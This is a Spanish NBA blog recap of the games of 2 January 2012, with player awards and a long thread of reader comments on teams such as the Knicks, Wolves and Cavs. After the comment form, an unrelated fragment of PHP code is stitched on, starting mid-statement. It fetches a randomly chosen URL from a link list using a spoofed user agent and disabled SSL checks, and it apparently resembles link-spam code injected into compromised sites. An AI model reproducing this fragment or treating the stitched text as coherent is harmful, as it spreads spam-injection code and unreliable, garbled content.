La Crónica (02/01/2012): Pierden Thunder y Heat

03 de January de 2012 por txusma

Ya no quedan equipos invictos. Los Heat cayeron ante unos más que sólidos Hawks que rompieron el partido en el último cuarto (100-92). Plantaron una zona que creó muchos problemas a Wade y compañía y contaron con un Tracy McGrady inspiradísimo que sacó a relucir todo su talento en el momento adecuado. Por su parte, los Thunder no pudieron con los actuales campeones (87-100) que están sufriendo el síndrome de la montaña rusa (pierdo 3 partidos, gano otro, pierdo con los Wolves, gano a Oklahoma…). Los Mavs van mejorando poco a poco a la vez que sus veteranos cogen la forma y las nuevas piezas van encajando.

Lo que si tenemos es todavía un equipo que no se ha estrenado. Los Wizards perdieron ante los Celtics mostrando una mejor cara que en anteriores partidos y con Andray Blatche ejerciendo, por fin, como líder en la cancha (92-100). Los jóvenes Wizards no le perdieron la cara al partido hasta que Ray ‘muñequita linda’ Allen sacó a pasear su fusil y les ametralló con un 3 de 3 en triples en el último cuarto. ¿Está un tanto infravalorado el ex jugador de Milwaukee y Seattle? Otros que perdieron fueron los Magic y lo hicieron, sorprendentemente, ante los Pistons, uno de los equipos que presumiblemente ganará menos partidos esta temporada (78-89). Faltos de talento, los Pistons saben que solo podrán conseguir victorias desde el trabajo, la intensidad y la defensa. Ayer sacaron a relucir todas estas cualidades para vencer a Orlando con Ben Gordon destacado en el aspecto ofensivo y Ben Wallace en el defensivo.

En lo que respecta a los españoles, victorias tanto de Jose Calderon como de Ricky Rubio. Toronto se impuso a los Knicks (90-85) con partidazo del español (9 puntos, 4 rebotes, 12 asistencias) y deja a New York muy, muy tocado. Por su parte, los Wolves siguen mostrando un gran potencial y anoche vencieron por primera vez en mucho tiempo a San Antonio (96-106). El quinteto titular estuvo casi perfecto y aunque Ricky no vivió su mejor noche nos dejó un par de jugadas para los TOP-10 del día. Ginobili se fracturó la mano y estará de baja durante un buen tiempo.

En el resto de partidos de la noche, victoria de Phoenix sobre Golden State (91-102), de Indiana sobre New Jersey (108-94), de Denver sobre Milwaukee (86-91) y de Utah sobre New Orleans (90-94).

TOP-10

PREMIOS

MVP: Los Wolves se hacen con su segunda victoria consecutiva gracias en buena parte a un nuevo partidazo de Kevin Love: 24 puntos, 15 rebotes, 3 robos y 2 tapones.

Rookie: Está pasando un poco desapercibido pero Markieff Morris (Phoenix Suns) demuestra a cada partido que sabe jugar a baloncesto. Anoche jugó 32 minutos en los que anotó 16 puntos y capturó 9 rebotes. Y Marshon Brooks continúa a lo suyo: 21 puntos y 7 rebotes más para el bolsillo.

Sorpresa: Me encanta comprobar que los viejos rockeros nunca mueren. Tracy McGrady sacó su arsenal ante uno de los grandes favoritos para llevarse el anillo y acabó el partido con 16 puntos (3 de 3 en triples), 7 rebotes y 4 asistencias. Absolutamente clave para que los Hawks se llevaran la victoria.

Decepción: Duelo de pérdidas en el Wizards-Celtics. Tanto John Wall como Rajon Rondo perdieron hasta 7 balones. Brandon Jennings se quedó cerca con 6.

Esfuerzo en vano: Anoche, las mejores actuaciones fueron de jugadores que acabaron perdiendo sus partidos. Jarrett Jack 27-5-11, Carmelo Anthony 35-11-4, Andray Blatche 28-9, Lebron James 28-7-6… Buenos días individuales y malos días colectivos.

Imágenes | AP Photos / Getty Images

Comenta

38 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Como mola ver a T-Mac cargandose a LeBron, a Allen matar partidos, a Dirk superando a los Thunders…¡¡¡como molan los viejales!!!

    Y aunque no sea un viejales, lo de Kevin Love es casi indescriptible.

      Citar

  2. melo15 dice:
    #2

    Kevin Love es un dios, esos numeros no los hacia ni KG.
    Partidazo de Melo, despues dicen que no se lo curra, pero si siguen asi no se clasifican ni a playoffs, yo venderia a Stat por dos jugadores interirores que defiendan y otro jugador de banquillo, esto despues de despedir a Dantoni.
    que pensais?
    A

      Citar

  3. rumbero dice:
    #3

    Viva_Dirk:
    Como mola ver a T-Mac cargandose a LeBron, a Allen matar partidos, a Dirk superando a los Thunders…¡¡¡como molan los viejales!!!

    Y aunque no sea un viejales, lo de Kevin Love es casi indescriptible.

    Viejales power!! Como gusta ver a T-Mac con esa clase y a Allen metiendo un 6/7 triples sin despeinarse.
    Te has dejado a Nash que hoy le ha enseñado 4 cosas al bueno de Curry. Y siguiendo con los Suns, buena pinta tiene Markieff Morris, que en el solar que es Phoenix se está marcando partidos muy sólidos. Otro rookie a seguir.

    Lo de Love es abusar. Un mal partido suyo es 15-10. Y una pena lo de Manudo. Esperemos que no tenga para mucho.

      Citar

  4. Ru dice:
    #4

    Que Toronto deje en 85 puntos a los Knicks es para que se empiecen a retorcer en el Madison y le den un toquecito a D’Antoni,vamos,hablo desde el desconocimiento ya que no vi el partido,pero palman contra Raptors y van 2-3 con unas sensaciones alejadas de lo que se respiraba antes de empezar la temporada,por mucho que Stoudemire no haya estado disponible.

    Y como tengo el día criticón,¿dónde está John Wall?No ha dado ningún paso adelante de momento esta temporada,y la franquicia está sobre sus hombros.El peor equipo de la NBA…

    Dado que estamos en 2012,aprovecho para seguir con mi campaña “Deron se pira de los Nets” y “ni de ful Howard a Brooklyn” xDD

    Buenos días a todos,jaja.

      Citar

  5. nach dice:
    #5

    melo15:
    Kevin Love es un dios, esos numeros no los hacia ni KG.
    Partidazo de Melo, despues dicen que no se lo curra, pero si siguen asi no se clasifican ni a playoffs, yo venderia a Stat por dos jugadores interirores que defiendan y otro jugador de banquillo, esto despues de despedir a Dantoni.
    que pensais?
    A

    No todo son los números Melo…lo digo por lo de KG
    Echar a Stat? revientas ya no solo el juego interior ofensivo, si no una de las bases del juego del equipo que quiere imponer Dantoni? Pocos 4-5 hay en la liga con la movilidad y velocidad de Stat, que es lo que necesitan para ejecutar el juego Dantoni. El problema? necesitan un base. En Phoenix no estaba un jugador como Melo que acapara todos los balones que acapara este y tenían a un base que domina el pick&roll a la perfección. Habrá que esperar a que esté Davis bien para poder ver el nivel real del equipo. Hasta entonces son todo conjeturas. Y más hoy que Stat no jugó el último partido.

      Citar

  6. melo15 dice:
    #6

    Ru tienes toda la razon, que los knicks solo le metamos 85 a uno de los peores equipos defensivos de la liga es para ponerse a llorar

      Citar

  7. Blade Petrovic dice:
    #7

    Melo ves como Bargiani es mejor que Melo

      Citar

  8. Blade Petrovic dice:
    #8

    Ya decía yo habría defendido bien bargnani a Stat

      Citar

  9. rumbero dice:
    #9

    De acuerdo con nash. Para mi el mayor problema de Stat es Melo. Antes de su llegada tenía más balón y se notaba mucho más su incidencia en el juego. Ahora le han triado a Chandler para que se pegue con los grandotes, pero si en ataque le van a dar poca bola…
    PD: Sin ir más lejos hoy Anthony se ha cascado 31 tiritos…casi nada (Melo no te me enfades xD)

      Citar

  10. Vader dice:
    #10

    Kevin Love brutal, a mi no me convencia por su físico pero viendole jugar me tiene absolutamente enamorado. No es un “hace números” ni mucho menos, tiene una gran intensidad, a mejorado su tiro de larga distancia, rebotea, se faja debajo el aro. En definitiva un líder para construir algo. Ojo con los lobos que igual luchan hasta para entrar en playoff.

    Sobre los Knicks, calma, mucha calma. Si ya de por si la plantilla es corta jugar sin Stat, Jeffries, Shumpert y … sin base porque Douglas puede ser y debe ser un gran microondas pero no es un base pues hay que calmarse y esperar que vayan regresando los jugadores lesionados, esperar a ver en que estado vuelve y que puede aportar Baron Davis y esperar tambien en que gastan los Knicks la mini-mid level que les queda…

    Cuando la plantilla este completa será el momento de ver en que situación esta el proyecto y aunque para entonces el record puede ser malo si el equipo carbura tiene minbres para hacer una segunda parte de temporada muy buena.

    Saludos

      Citar

  11. HeiNeKeN dice:
    #11

    Hoy Michael Beasley también ha estado muy bien, de hecho los Wolves hasta el ultimo cuarto llevaban unos porcentajes de escandalo con 11 de 13 en ttriples y gente como Johnson o Ridnour con más de 10 puntos sin fallos de tiro.

    PD: Tolliver resolutivo otra vez… esta vez como no le entraban los triples le rompió la mano a Ginobili entrando a canasta…

      Citar

  12. nach dice:
    #12

    Es que el tema es que yo no estoy tan seguro de que Melo sea el paradigma de jugador para esa posición de D’Antoni…En Phoenix Marion y Diaw se rotaban las posiciones de 3 y de falso 4, Melo con la llegada de Chadler está jugando de 3, y no es un jugador tan rápido como Marion ni con la capacidad de Diaw para hacer tantas cosas u ocupar tantas posiciones (por mentalidad, porque Melo es aproximadamente 8 veces más jugador que Diaw), además de acaparar muchísimo balón porque no es un ejecutor como eran estos 2, y especialmente Marion, en los Suns, donde apenas tenían el balón en las manos excepto para hundirla o hacer un tiro abierto, el que canalizaba todo el juego era Nash, era el dueño del balón, y esa dirección falta en los Knicks.

    Si consiguen que Baron Davis organice el equipo en ataque como debe y evitan que Melo tenga el balón tanto tiempo en sus manos, tendrán mucho ganado, de lo contrario 1 de los 2 sobra, o bien Melo o bien Stat, porque necesitan estilos de juego contrarios para brillar a no ser que uno de los 2 se adapte.

      Citar

  13. Juan dice:
    #13

    Steve Nash hizo un partidazo, también se merece el MVP de la jornada.

      Citar

  14. Pop dice:
    #14

    Vader: Kevin Love brutal, a mi no me convencia por su físico pero viendole jugar me tiene absolutamente enamorado. No es un “hace números” ni mucho menos, tiene una gran intensidad, a mejorado su tiro de larga distancia, rebotea, se faja debajo el aro. En definitiva un líder para construir algo. Ojo con los lobos que igual luchan hasta para entrar en playoff.</P

    Yo ya habia apostado por ellos en playoffs. A mi tampoco me convencia Love, le creía eso, un busca números, seguramente porque le vi muy poco la temporada pasada. Ahora me he tragado todos los partidos de los Wolves por eso de RIcky, y a mi también me tiene obsesionado, y además se ve que es el más feliz de todos con la llegada de Ricky. A mi me estupefacta sus rebotes ofensivos, es que parece que el balón le busca tras rebotar.

    Adelman ayer perfecto. Ridnour estaba en gracia y le dio más continuidad que otras noches, con Ricky más testimonial. De todas formas, por si acaso se cascó un par de jugadas para highlights. Y el acierto en el tiro de Minnesota en la primera mitad es demoledor, como jugar al 2K en modo rookie xD.

      Citar

  15. Pop dice:
    #15

    La cita de Vader es solo el primer parrafo, el resto es mio, que me he equivocado con los botoncitos.

      Citar

  16. rumbero dice:
    #16

    A mi me sorprendería muchísimo que se metiren en playoffs. Demasiado gallito hay en el Oeste y tampoco debe ser su objetivo clasificarse. A partir de aqui soñar es gratis…

      Citar

  17. Nacho dice:
    #17

    HeiNeKeN: Hoy Michael Beasley también ha estado muy bien, de hecho los Wolves hasta el ultimo cuarto llevaban unos porcentajes de escandalo con 11 de 13 en ttriples y gente como Johnson o Ridnour con más de 10 puntos sin fallos de tiro.PD: Tolliver resolutivo otra vez… esta vez como no le entraban los triples le rompió la mano a Ginobili entrando a canasta…

    Cierto, ayer lo puse a caer de un burro, pero hoy tengo que admitir que hizo buen partido. Eso sí, sigue sin gustarme. Es de los tipos que recibe la bola y se la juega sí o sí (bueno dio dos veces el balón y una fue asistencia)De hecho que Ricky solo hiciera un partido correcto se debió a que sus ataques fueron subir la bola esperar aclarados y dársela a Beasley.
    Ojito con estos lobos, han tenido el arranque más complicado y aunque hayan jugado cuatro veces en casa llevan dos victorias luchando con cocos..
    Por cierto dijo Daimiel que el entrenador de los Raptors le venía muy bien a Calde, y acertó, y yo añadiría que al equipo también, y Bargnani puede devenir en la estrella que apuntaba a ser. Y esto lo digo sin coñas.
    Por otro lado mola que Thunder y Heat hayan perdido, ya nadie destaca tanto. Aunque siguen siendo los favoritos.
    Sigo creyendo que Raptors y Wolves pueden dar muchas sorpresas, ya no se si es por deseos o por que realmente lo pueden hacer, y espero equivocarme (sobre todo por Melo) pero me da que los de New York serán el bluf de la temporada.

      Citar

  18. Año aciago dice:
    #18

    Soy de los Knicks y lo veo negro, muy negro. El problema es fundamentalmente de dirección de juego, y no sé si Davis es el jugador que pueda hacer cambiar esto. Me temo que no. Ojalá tuviésemos al mismo Calderón, que anoche se meó en todos nuestros bases.
    Vista la cosa, este año me paso a los Wolves. Asisto con curiosidad a las evoluciones de Ricky y con Kevin Love es eso, puro Love. Es una mezcla de lo que habría querrido ser Felipe Reyes en el mejor de sus sueños lúbricos y lo que hubiese querido ser Garbajosa. Lleva números de MVP y sospecho que los Wolves van a ser uno de los equipos que más evolucionen este año si Beasley se corta un poco, Barea aporta, Ricky sigue en la misma onda y Ridnour juega, al menos, la mitad de bien que anoche. Go Wolves! Por ahora, cayeron Dallas y SAS, y cerca estuvo de ocurrir con OCT y Miami. El de los Bucks ha sido el único partido realmente malo.

      Citar

  19. HisRoyalAirness dice:
    #19

    Yo en la porra me columpié y puse a los lobitos en playoffs porque tuve una revelación. En el este creo que los tendrían bastante asequibles pero ya sabemos todos cómo es el wild wild west.

    Kevin Love está en plan criatura mitológica, qué bárbaro

      Citar

  20. Cocinitas dice:
    #20

    Cada día que pasa Kevin Love me parece mejor jugador, si se conjuntan un poco más los Rookies y se centra Beasley y deja de ser un chupón, cuidado con ellos. Según vayan pasando los partidos lo harán mejor, ya que además poseen un buen banquillo, quiero recordar que ayer no estuvo JJ Barea, y que el otro día llegaron todos los integrantes del banquillo a los dobles dígitos en anotación.
    Lo de New York es como todo los años, creo que se la van a pegar. En mi opinion tienen un gran quinteto, pero no tienen nada en el banco y en una temporada como esta eso es crucial. Aún así les dará para entrar 6º o 7º en playoffs en el este.
    Los Spurs ayer no dieron muy buena imagen contra un equipo joven, tambien debo decir que vi el partido y a los Wolves le entró todo desde la linea de tres, increíbles los porcentajes que llegaron en tramos al 88% de acierto. Mala lesión de Manudo, rotura del 5º metatarsiano de la mano izda. si se pierde muchos partidos los Spurs van a sufrir mucho. Me encantó el primer cuarto de Duncan que dio una clase de calidad y buena selección de tiro y acabo con 10 puntos, pero claro ahí se le acabo la gasolina.
    Miami perdió en el último cuarto contra un muy buen equipo como es Atlanta, y me pasó como con Duncan, crei estar en otra época viendo el último cuarto de T-Mac. Por cierto cada vez tengo más claro que el robo del draft de este año es Norris Cole, vaya ojo que han tenido los Heat casi igual que Bibby, como consigan un pívot decente van a ser invencible.
    Lo del league pass gratis es una pasada jeje, tras la noche NBA que llevaba aún tuve tiempo de ver un rato el Nuggets-Bucks, creo que Denver es otro de los benefiados por el calendario del Lockout ya que para mi tienen la plantilla más larga y compensada de la liga. Si Nené y Gallinari dan un paso al frente cuidado con ellos en Playoffs.
    Bueno y después de contaros los que me parecieron los partido de ayer queria comentaros otra cosita, bueno es un off-topic como una casa pero allá va. Algunos de los que seguimos este blog diariamente nos quedamos fuera de la fantasy league, y había pensado en crear otra de 15 o 20 equipos para poder jugar los que nos quedamos fuera, si alguien que ya tiene equipo quiere hacerse otro por mi perfecto cuantos más mejor. Habia pensado en hacerla en ESPN, porque hoops no se muy bien como va. Bueno dejo aquí mi email por si a alguien le interesa. cocinitas1@hotmail.com
    Dado que es un off-topic, quiero pedir perdón nuevamente y pedir que si por favor molesta no dudeis en quitarlo.
    Un saludo a todos los que haceis de este blog el mejor y más divertido de cuantos hay sobre la NBA. Gracias.

      Citar

  21. Denise dice:
    #21

    El mate de Bosh que aparece en el top 10 me da asco de verlo. Si es muy espectacular….pero ¿cuantos pasos da? 5 como mínimo, creo que da hasta 6 sin botar el balón….una cosa es no pitar el primer paso de salida y otra esto.

      Citar

  22. Txusma dice:
    #22

    Nada de offtopic cocinitas. A ver si la gente se anima y se apunta.
    Y por cierto, estamos trabajando para el año que viene ofreceros una liga fantasy de nivel totalmente ‘tj’. Ya os iremos dando noticias.

      Citar

  23. Esteban dice:
    #23

    consulta amigos del blog, q pasa con james posey y al thorthon?

    pregunto por q serian dos jugadores que podrian cambiar definitivamente la ecuacion de los clippers,

    el equipo de griffin y paul, sigue para mi siendo el mas atractivo de ver, por lo novedoso del roster en primer lugar, por las abundantes clavadas de jordan y griffin, por la evolucion de griffin, pronto a ser una hiperestrella y por supuesto por la calidad de paul

    eh visto sus partidos, contra rivales de mas fuste, lease chicago y portland, ambos sin billups, pero creo que su deficit sigue siendo la banca, POR LEJOS LA PEOR DE LA NBA, solo MO que se ah acomplado incriblemente bien a su papel de sexto hombre despunta, el resto mamita…

    ryan gomes esta cerca de ser un ex jugador y brian cook es su interno de recambio… creo que eso nos dice todo,

    aun con la vuelta de billups y foye en cierto nivel les esta faltando algo, un alero que pueda defender, butler no puede, que podria ser posey ya que esta libre, la recuperacion de evans para aportar defensa y rebotes, y por q no, la inclsion de thorthon para darle gol desde la banca en los descansos de griffin…

    q opinan? dificilmente ambos se concreten, pero viendo los 9 millones que tiene de sobra LAC, creo que deberian usarlos, hoy por hoy, con sa banca no pasan primera ronda…

      Citar

  24. Esteban dice:
    #24

    otra consulta, bien el muy mal arranque de boston, y la lesion de o´neal, y la falta de un pivot… estaba pensando a quien podrian adquirir, pensando en hombres grandes buenos y que puedan salir de sus equipos, se me vino a la cabeza al jefferson, un ex celtic, utha esta en reconstruccion y tienen a millsap para jugar de 4 y favors y kanter para jugar de 5, asi que podria darse la salida de jefferson

    la cunsulta es, tiene los celtics aun la ferta qualificada pro jeff green para meterlo en un intercambio? que primeras rondas tienen disponible?

    en mi opinion, jefferson es la pieza que le falta a los celtics, con el vuelven inmediatamente a la carrera por el titulo

      Citar

  25. Sempren dice:
    #25

    Iba por el comentario nº 19 y estaba pensando que había sido el único friki que se había fijado e indignado como para comentar los pasos de Bosh… ascazo. Lo peor es que seguro que si pides pasos, quedas como el chivato envidioso de la clase, por no poder hacer la jugadita.

    Y bueno, no es por defender a los Knicks (y otros equipos en plena mala racha), que tampoco son santo de mi devoción ni mucho menos, pero aunque la temporada vaya a ser corta, hay que recordar que estamos muy a principios de temporada, hay muchos jugadores poco en forma, y equipos que aún no están conjuntados, aparte de las bajas…

      Citar

  26. Vader dice:
    #26

    Sempren:
    Y bueno, no es por defender a los Knicks (y otros equipos en plena mala racha), que tampoco son santo de mi devoción ni mucho menos, pero aunque la temporada vaya a ser corta, hay que recordar que estamos muy a principios de temporada, hay muchos jugadores poco en forma, y equipos que aún no están conjuntados, aparte de las bajas…

    Es lo que digo yo… es muy pronto para sacar conclusiones. Por lo menos yo no lo haré hasta que B.Davis lleve unas cuantas semanas jugando con el equipo.

    Otra cosa es que ya hay el “rumor” de que si este año el equipo no da buenas sensaciones, ni no se consigue que Melo y Stat rindan los dos a la vez a nivel all-star el año que viene traspasan a Stat a canvio de algún base o escolta de primer nivel. Porque con el sueldo que tienen o los dos rinden mucho o la cosa no se aguanta… Pero vamos que yo soy optimista porque de una forma u otra estaremos mucho mejor que hace 2 años que no teniamos nada… jajajaja

    Saludos

      Citar

  27. melo15 dice:
    #27

    Me parece increible que dudeis de los knicks, y si, estoi enfadado!!!
    Lo que tiene que hacer Stat es concentrarse en defender un poco, aprovechar su cualidades, y dejar que Melo sea el lider del equipo (35-11-4) por si ha alguien se le habia olvidado, o cambiar a Stat y Davis, por un base y dos interiores, los Knicks 3 o 4 en el Este. Nach, esque no hay que ejecutar el metodo D’antoni.La mid-level cuanta pasta es.
    lo del traspaso de Al Jefferson, bastante imposible, y mas por Green, que alomejor se retira

      Citar

  28. melo15 dice:
    #28

    MELO MVP!!!

      Citar

  29. esteban dice:
    #29

    Melo tengo entendido q los jugadores cortados por la anmistia no son traspasables por un aÑo asi q olvida incluir a davis en un trada

    Green retirado? De donde salio eso? Tengo entendido q se opero y su carrera no estaria en riesgo…

      Citar

  30. melo15 dice:
    #30

    Bueno,en teoria no hay peligro,pero…

      Citar

  31. Sempren dice:
    #31

    melo15:
    Me parece increible que dudeis de los knicks, y si, estoi enfadado!!!

    Es que sí, dudar de un equipo como los Knicks, que llevan una década prodigiosa, siempre alcanzando los objetivos y no decepcionando nunc… oh, wait!

      Citar

  32. Pop dice:
    #32

    Dudar de los Knicks es como dudar del Atlético de Madrid.

      Citar

  33. Sancho88 dice:
    #33

    en dailynews dicen que Shumpert y Stoudamire podrían volver mañana contra Bobcats

      Citar

  34. amador rivas dice:
    #34

    en los knicks faltan: davis, stat, shumpert y jeffries

    ahora mismo el titular es: douglas, fields, melo, harrellson, chandler
    ahora mismo su banco es: balkman, bibby, walker, novak, james

    cuando se recuperen el titular sera: davis, fields, melo, stat, chandler
    cuando se recuperen la banca sera: douglas, shumpert, jeffries, harrellson, bibby, walker, balkman,…. y seguramente en marzo vayan con la exception de 2’5 a por chandler

    PD: si hay un traspaso y amare es el sacrificado, un alapivot de garantias y dos suplentes, uno especialista en defender y el otro un tirador…. ya lo se, soy muy exigente 😉

      Citar

  35. Esteban dice:
    #35

    wow 3-2 los cavs! 20 y 6 para irving, madre este chico tiene futuro, y scott esta haciendo un enorme trabajo, mantuvo motivado a jamison, que esta jugando mejor que en los ultimos 2 años, y mantiene a nivel a varejao, quien hoy en dia tiene un enorme valor en el mercado, alguien ofrece unas rondas por el? se oyen ofertas…

    por otro lado thompson, tamb esta respondiendo enormemente, creo que los cavs se llevaron a los dos mejores rookies, por lo demostrado de a momento y con la mayor proyeccion

    creo que van a traspasar a varejao, jamison y a gibson si siguen en este nivel por rondas, con un equipo tan entrado en años no creo que quieran pelear por PO y quedar demasiado bajo en la loteria

      Citar

  36. Sancho88 dice:
    #36

    molan los cavs, estoy de acuerdo con esteban. un juego muy fluído y ofensivo, y atrás no son monjas de la caridad, precisamente. Jugadores jóvenes que si bIen no tienen nombre aún: Irving, Thompson, Samuels, Gee… le echan pelotas. Para mí el chufo aquí se llama Omri Casspi, que no creo que esté pensando en baloncesto en estos momentos. Está más perdido que Rambo en la casa de las Mujercitas. Y como padre de todos ellos, Jamison. N

      Citar

  37. Sancho88 dice:
    #37

    Vaya, se me cortó. No es exagerado decir que Jamison sería la pieza para completar algún puzzle hacia el título. Ya lo debió ser hace dos años, cuando le trajo Mike Brown para el anillo de Lb, y quizás por eso mucha gente desconfía de él, pero lo cierto es que puede hacer de todo y además lo hace bien. En una liga donde es cada día más complicado ver fundamentos de juego en equipo entre los jóvenes, da gusto ver a algunos veteranos dominar el partido con la en estos aspectos

      Citar

  38. nach dice:
    #38

    melo15:
    Me parece increible que dudeis de los knicks, y si, estoi enfadado!!!
    Lo que tiene que hacer Stat es concentrarse en defender un poco, aprovechar su cualidades, y dejar que Melo sea el lider del equipo (35-11-4) por si ha alguien se le habia olvidado, o cambiar a Stat y Davis, por un base y dos interiores, los Knicks 3 o 4 en el Este. Nach, esque no hay que ejecutar el metodo D’antoni.La mid-level cuanta pasta es.lo del traspaso de Al Jefferson, bastante imposible, y mas por Green, que alomejor se retira

    Ya se que el método D’Antoni no es obligatorio, pero si lo fichas para dirigir un equipo, es de esperar que lo hagas xD.
    Y eso que el fichaje de Chandler no pega mucho con el pero…igual está intentando una variante de los Suns mejor en juego estático, pero no se hasta que punto será posible, porque Chandler en ataque es muy limitado, y Stat necesita espacios.
    Lo que tendría que hacer Carmelo es dejar de acaparar tanto balón y convertirse en un ejecutor, teniendo en cuenta su talento y sus cualidades para anotar desde cualquier posición, se convertiría en uno de los mejores de la NBA, pero para hacer eso necesitan un director, lo tenían con Billups, y lo largaron, a ver como les sale el tema Davis, pero en Golden State ya demostró ser capaz de mandar un equipo que juegue ofensivamente…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>